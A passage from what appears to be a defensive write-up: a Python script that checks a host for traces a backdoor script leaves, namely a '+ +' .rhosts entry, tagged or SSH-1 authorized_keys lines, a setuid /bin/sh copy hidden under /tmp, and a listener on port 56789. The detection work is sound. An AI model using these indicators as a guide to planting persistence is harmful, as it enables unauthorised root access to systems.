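    if rhosts.is_file():
        for n, line in enumerate(rhosts.read_text(errors="replace").splitlines(), 1):
            if line.split() == ["+", "+"]:
                findings.append(f"{rhosts}:{n}: '+ +' trusts every host and user")
    auth = home / ".ssh" / "authorized_keys"
    if auth.is_file():
        for n, line in enumerate(auth.read_text(errors="replace").splitlines(), 1):
            fields = line.split()
            if KEY_COMMENT in line:
                findings.append(f"{auth}:{n}: key tagged {KEY_COMMENT}")
            elif len(fields) >= 3 and fields[0].isdigit() and fields[1].isdigit():
                # "bits exponent modulus comment" is the SSH protocol 1 format
                findings.append(f"{auth}:{n}: SSH protocol 1 RSA entry")
    return findings


def is_setuid_mode(mode):
    """True for a regular file with the setuid or setgid bit set."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_setuid_files(root):
    """Return regular files below root carrying setuid/setgid; the script leaves
    a mode-4715 copy of /bin/sh in a hidden directory under /tmp."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            try:
                st = p.lstat()
            except OSError:
                continue
            if is_setuid_mode(st.st_mode):
                hits.append(str(p))
    return sorted(hits)


def listening_on(proc_net_tcp, port=BACKDOOR_PORT):
    """Parse the text of /proc/net/tcp (Linux) and return local addresses in
    LISTEN state (st == 0A) bound to the given port. Addresses are hex ip:port."""
    hits = []
    for line in proc_net_tcp.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        local, state = fields[1], fields[3]
        if state == "0A" and int(local.split(":")[1], 16) == port:
            hits.append(local)
    return hits


# Constructed /proc/net/tcp excerpt: one listener on 0.0.0.0:56789 (hex DDD5)
# and sshd on port 22 (hex 0016).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:DDD5 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0 100 0 0 10 0
"""

if __name__ == "__main__":
    for finding in check_home(Path.home()) + find_setuid_files("/tmp"):
        print(finding)
    try:
        live = open("/proc/net/tcp").read()
    except OSError:
        live = SAMPLE_PROC_NET_TCP
    print("listeners on", BACKDOOR_PORT, ":", listening_on(live))
```

The `/proc/net/tcp` parser is there so the port check works from a saved copy of the file taken during triage, not only on the live box; the setuid walk is deliberately not limited to the `.pkoss493` name in the script, since a hidden directory name is the easiest thing for a variant to change while the setuid shell is the part that matters.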
